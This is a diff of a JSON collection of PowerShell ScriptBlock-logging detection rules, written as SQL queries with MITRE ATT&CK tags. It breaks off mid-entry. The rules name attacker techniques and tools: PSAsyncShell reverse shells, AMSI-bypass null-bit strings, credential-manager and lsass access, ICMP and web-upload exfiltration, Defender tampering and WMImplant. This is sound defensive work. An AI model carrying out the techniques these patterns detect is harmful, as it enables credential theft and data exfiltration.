@@ -6775,48 +6661,67 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% > %' ESCAPE '\\' OR ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" ], - "filename": "posh_ps_user_discovery_get_aduser.yml" + "filename": "posh_ps_computer_discovery_get_adcomputer.yml" }, { - "title": "Suspicious TCP Tunnel Via PowerShell Script", - "id": "bd33d2aa-497e-4651-9893-5c5364646595", + "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", + "id": "afd3df04-948d-46f6-ae44-25966c44b97f", "status": "experimental", - "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.execution", + "attack.t1059.001" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE 
'%PSAsyncShell%' ESCAPE '\\')" + ], + "filename": "posh_ps_psasyncshell.yml" + }, + { + "title": "PowerShell ADRecon Execution", + "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "status": "experimental", + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "author": "Bhabesh Raj", + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Net.HttpWebRequest]%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.Sockets.TcpListener%' ESCAPE '\\' AND ScriptBlockText LIKE '%AcceptTcpClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_proxy_scripts.yml" + "filename": "posh_ps_adrecon_execution.yml" }, { - "title": "Potential Persistence Via Security Descriptors - ScriptBlock", - "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", + "title": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging", + "id": "fa2559c8-1197-471d-9cdd-05a0273d4522", "status": "experimental", - "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. 
As seen used in the DAMP project.", + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR ScriptBlockText LIKE '%#%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_ace_tampering.yml" + "filename": "posh_ps_amsi_null_bits_bypass.yml" }, { "title": "Malicious ShellIntel PowerShell Commandlets", 
@@ -6838,193 +6743,196 @@ "filename": "posh_ps_shellintel_malicious_commandlets.yml" }, { - "title": "Suspicious IO.FileStream", - "id": "70ad982f-67c8-40e0-a955-b920c2fa05cb", - "status": "test", - "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", - "author": "frack113", + "title": "Potential WinAPI Calls Via PowerShell Scripts", + "id": "03d83090-8cba-44a0-b02f-0b756a050306", + "status": "experimental", + "description": "Detects use of WinAPI Functions in PowerShell scripts", + "author": "Nikita Nazarov, oscd.community, Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.execution", + "attack.t1059.001", + "attack.t1106" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%IO.FileStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\.\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%AddSecurityPackage%' ESCAPE '\\' OR ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%Advapi32%' ESCAPE '\\' OR ScriptBlockText LIKE '%CloseHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateRemoteThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%DangerousGetHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%EnumerateSecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%FreeLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetLogonSessionData%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetModuleHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcessHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetTokenInformation%' ESCAPE '\\' OR ScriptBlockText LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%kernel32%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoadLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%memcpy%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%msvcrt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ntdll%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenDesktop%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcessToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenWindowStation%' ESCAPE '\\' OR ScriptBlockText LIKE '%QueueUserApc%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%secur32%' ESCAPE '\\' OR ScriptBlockText LIKE '%SetThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualAlloc%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualFree%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualProtect%' ESCAPE '\\' OR ScriptBlockText LIKE '%WaitForSingleObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteInt32%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. 
or its affiliates.%' ESCAPE '\\' AND ScriptBlockText LIKE '%function Import-SerialPortUtil %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_iofilestream.yml" + "filename": "posh_ps_accessing_win_api.yml" }, { - "title": "PowerShell Hotfix Enumeration", - "id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", - "status": "experimental", - "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Powershell Local Email Collection", + "id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "status": "test", + "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", + "author": "frack113", "tags": [ - "attack.discovery" + "attack.collection", + "attack.t1114.001" ], "falsepositives": [ - "Legitimate administration scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_QuickFixEngineering%' ESCAPE '\\' AND ScriptBlockText LIKE '%HotFixID%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Inbox.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook.olDefaultFolders%' ESCAPE '\\' OR ScriptBlockText LIKE '%-comobject outlook.application%' ESCAPE '\\'))" ], - "filename": "posh_ps_hotfix_enum.yml" + "filename": "posh_ps_susp_mail_acces.yml" }, { - "title": "Powershell MsXml COM Object", - "id": "78aa1347-1517-4454-9982-b338d6df8343", + "title": "Import PowerShell Modules From Suspicious 
Directories", + "id": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", "status": "experimental", - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", - "author": "frack113, MatilJ", + "description": "Detects powershell scripts that import modules from suspicious directories", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%MsXml2.%' ESCAPE '\\' AND ScriptBlockText LIKE '%XmlHttp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo 
\"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_msxml_com.yml" + "filename": "posh_ps_import_module_susp_dirs.yml" }, { - "title": "Powershell Local Email Collection", - "id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "title": "Suspicious PowerShell Invocations - Generic", + "id": "ed965133-513f-41d9-a441-e38076a0798f", "status": "test", - "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", - "author": "frack113", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1114.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Inbox.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook.olDefaultFolders%' ESCAPE '\\' OR ScriptBlockText LIKE '%-comobject outlook.application%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText 
LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_mail_acces.yml" + "filename": "posh_ps_susp_invocation_generic.yml" }, { - "title": "Winlogon Helper DLL", - "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", "status": "experimental", - "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CurrentVersion\\\\Winlogon%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Set-ItemProperty%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Item%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "posh_ps_winlogon_helper_dll.yml" + "filename": "posh_ps_tamper_defender_remove_mppreference.yml" }, { - "title": "Potential Suspicious Windows Feature Enabled", - "id": "55c925c1-7195-426b-a136-a9396800e29b", + "title": "Windows PowerShell Upload Web Request", + "id": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", "status": "experimental", - "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.exfiltration", + "attack.t1020" ], "falsepositives": [ - "Legitimate usage of the features listed in the rule." 
+ "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%TelnetServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TFTP%' ESCAPE '\\' OR ScriptBlockText LIKE '%SMB1Protocol%' ESCAPE '\\' OR ScriptBlockText LIKE '%Client-ProjFS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\') AND ScriptBlockText LIKE '%-Method %' ESCAPE '\\' AND (ScriptBlockText LIKE '% Put %' ESCAPE '\\' OR ScriptBlockText LIKE '% Post %' ESCAPE '\\'))" ], - "filename": "posh_ps_enable_susp_windows_optional_feature.yml" + "filename": "posh_ps_upload.yml" }, { - "title": "PowerShell Get-Process LSASS in ScriptBlock", - "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "title": "WMImplant Hack Tool", + "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "status": "test", - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects parameters used by WMImplant", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1047", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Administrative scripts that use the same 
keywords." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_getprocess_lsass.yml" + "filename": "posh_ps_wmimplant.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", - "id": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", - "status": "experimental", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "title": "Execution via CL_Mutexverifiers.ps1", + "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "status": "test", + "description": "Detects Execution via runAfterCancelProcess in 
CL_Mutexverifiers.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Compress-Archive %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DestinationPath %' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_zip_compress.yml" + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" }, { - "title": "Potential Data Exfiltration Via Audio File", - "id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", - "status": "experimental", - "description": "Detects potential exfiltration attempt via audio file using PowerShell", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Dump Credentials from Windows Credential Manager With PowerShell", + "id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "status": "test", + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE 
'%[System.Math]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%[IO.FileMode]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%BinaryWriter%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x52%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x49%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x46%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x57%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x41%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x56%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x45%' ESCAPE '\\' AND ScriptBlockText LIKE '%0xAC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-PasswordVaultCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CredManCreds%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Windows.Security.Credentials.PasswordVault%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.CSharp.CSharpCodeProvider%' ESCAPE '\\' AND ScriptBlockText LIKE '%[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())%' ESCAPE '\\' AND ScriptBlockText LIKE '%Collections.ArrayList%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.CodeDom.Compiler.CompilerParameters%' ESCAPE '\\')))" ], - "filename": "posh_ps_audio_exfiltration.yml" + "filename": "posh_ps_dump_password_windows_credential_manager.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Powershell", - "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "PowerShell ICMP Exfiltration", + "id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", + "status": "test", + "description": "Detects Exfiltration Over Alternative Protocol - ICMP. 
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Unknown" + "Legitimate usage of System.Net.NetworkInformation.Ping class" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.NetworkInformation.Ping%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Send(%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" + "filename": "posh_ps_icmp_exfiltration.yml" }, { "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", 
@@ -7046,185 +6954,205 @@ "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Powershell", - "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", + "id": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 